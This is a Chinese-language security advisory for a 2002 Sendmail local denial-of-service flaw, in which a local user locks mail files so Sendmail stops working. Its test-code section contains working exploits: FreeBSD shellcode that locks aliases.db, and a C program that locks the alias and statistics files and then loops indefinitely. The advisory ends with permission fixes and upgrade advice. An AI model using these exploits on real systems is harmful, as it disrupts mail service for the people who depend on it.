Sendmail文件锁住产生拒绝服务攻击漏洞

发布时间：2002-05-28
更新时间：2002-05-28
严重程度：中
威胁程度：本地拒绝服务
错误类型：意外情况处置错误
利用方式：服务器模式

BUGTRAQ ID：4822

受影响系统

Sendmail Consortium Sendmail 8.9 .0
Sendmail Consortium Sendmail 8.9.1
Sendmail Consortium Sendmail 8.9.2
Sendmail Consortium Sendmail 8.9.3
   + SGI IRIX 6.5.10 f
   + SGI IRIX 6.5.10 m
   + SGI IRIX 6.5.11 f
   + SGI IRIX 6.5.11 m
   + SGI IRIX 6.5.12 f
   + SGI IRIX 6.5.12 m
   + SGI IRIX 6.5.13 f
   + SGI IRIX 6.5.13 m
Sendmail Consortium Sendmail 8.10
Sendmail Consortium Sendmail 8.10.1
Sendmail Consortium Sendmail 8.10.2
Sendmail Consortium Sendmail 8.11
   - MandrakeSoft Linux Mandrake 7.2
   + RedHat Linux 7.0
   + RedHat Linux 7.0 alpha
   + RedHat Linux 7.0 i386
   + RedHat Linux 7.0 sparc
   - S.u.S.E. Linux 7.0
   - S.u.S.E. Linux 7.0 alpha
   - S.u.S.E. Linux 7.0 ppc
   - S.u.S.E. Linux 7.0 sparc
   + SCO Open Server 5.0.4
   + SCO Open Server 5.0.5
   + SCO Open Server 5.0.6
   + SCO Open Server 5.0.6 a
Sendmail Consortium Sendmail 8.11.1
   + Caldera OpenLinux Server 3.1
   + Caldera OpenLinux Workstation 3.1
   + Conectiva Linux 6.0
Sendmail Consortium Sendmail 8.11.2
   + RedHat Linux 7.1
   + RedHat Linux 7.1 alpha
   + RedHat Linux 7.1 i386
   + RedHat Linux 7.1 ia64
   - S.u.S.E. Linux 7.1
   - S.u.S.E. Linux 7.1 alpha
   - S.u.S.E. Linux 7.1 ppc
   - S.u.S.E. Linux 7.1 sparc
   - S.u.S.E. Linux 7.1 x86
Sendmail Consortium Sendmail 8.11.3
   - MandrakeSoft Corporate Server 1.0.1
   - MandrakeSoft Linux Mandrake 8.0
   - S.u.S.E. Linux 7.2
   - Slackware Linux 7.1
Sendmail Consortium Sendmail 8.11.4
   + Conectiva Linux 7.0
   - Slackware Linux 8.0
Sendmail Consortium Sendmail 8.11.5
Sendmail Consortium Sendmail 8.11.6
Sendmail Consortium Sendmail 8.12 beta7
Sendmail Consortium Sendmail 8.12 beta5
Sendmail Consortium Sendmail 8.12 beta16
Sendmail Consortium Sendmail 8.12 beta12
Sendmail Consortium Sendmail 8.12 beta10
Sendmail Consortium Sendmail 8.12
Sendmail Consortium Sendmail 8.12.1
Sendmail Consortium Sendmail 8.12.2
Sendmail Consortium Sendmail 8.12.3

详细描述
Sendmail是邮件传送客户端，可使用在多种操作系统下。

flock()或者fcntl()函数用来锁住文件以防止其他未信任用户操作，如使用读的锁类型时文件只允许对文件读操作，可防止其他进程对此文件获得写操作。而攻击者可以通过使用这些函数对某些文件进行独专性操作而一直占有这个文件，使应用程序停止响应。

sendmail相关文件如别名，maps,统计和pid文件存在此问题，攻击者可以通过独专这些文件而使sendmail或者相关工具不能正常操作。

要判断SENDMAIL使用何种上锁方式，可使用如下方法：

sendmail -bt -d0.10 < /dev/null | grep HASFLOCK

如果HASFLOCK有输出，系统就使用flock()方式上锁，否则就使用了fcntl()方式。

测试代码
/*

FreeBSD Sendmail DoS shellcode that locks /etc/mail/aliases.db
Written by zillion (at http://www.safemode.org && http://www.snosoft.com)

More info: http://www.sendmail.org/LockingAdvisory.txt

*/

char shellcode[] =
        "\xeb\x1a\x5e\x31\xc0\x88\x46\x14\x50\x56\xb0\x05\x50\xcd\x80"
        "\x6a\x02\x50\xb0\x83\x50\xcd\x80\x80\xe9\x03\x78\xfe\xe8\xe1"
        "\xff\xff\xff\x2f\x65\x74\x63\x2f\x6d\x61\x69\x6c\x2f\x61\x6c"
        "\x69\x61\x73\x65\x73\x2e\x64\x62";

int main()
{

  int *ret;
  ret = (int *)&ret + 2;
  (*ret) = (int)shellcode;
}

-----------------------------------------------------------------------

#include <fcntl.h>
#include <unistd.h>

/*

Stupid piece of code to test the sendmail lock vulnerability on
FreeBSD. Run this and try sendmail -t on FreeBSD for example.

More info: http://www.sendmail.org/LockingAdvisory.txt

zillion (at safemode.org && snosoft.com)
http://www.safemode.org
http://www.snosoft.com

*/

int main() {

  if(fork() == 0) {

    char *lock1 = "/etc/mail/aliases";
    char *lock2 = "/etc/mail/aliases.db";
    char *lock3 = "/var/log/sendmail.st";

    int fd;
    fd = open(lock1,O_RDONLY);
    flock(fd,0x02);

    fd = open(lock2,O_RDONLY);
    flock(fd,0x02);

    fd = open(lock3,O_RDONLY);
    flock(fd,0x02);

    /* We are here to stay! */

    for(;;) {}

  }
}

解决方案
暂时改变SENDMAIL某些文件的权限：

    chmod 0640 /etc/mail/aliases /etc/mail/aliases.{db,pag,dir}
    chmod 0640 /etc/mail/*.{db,pag,dir}
    chmod 0640 /etc/mail/statistics /var/log/sendmail.st
    chmod 0600 /var/run/sendmail.pid /etc/mail/sendmail.pid

请升级到SENDMAIL8.12.4版本。

相关信息
lumpy <dynamo@ime.net>.
参考：http://online.securityfocus.com/archive/1/274029
http://online.securityfocus.com/archive/1/274033
相关主页：http://www.sendmail.org/

最近严重漏洞

Sendmail文件锁住产生拒绝服务攻击漏洞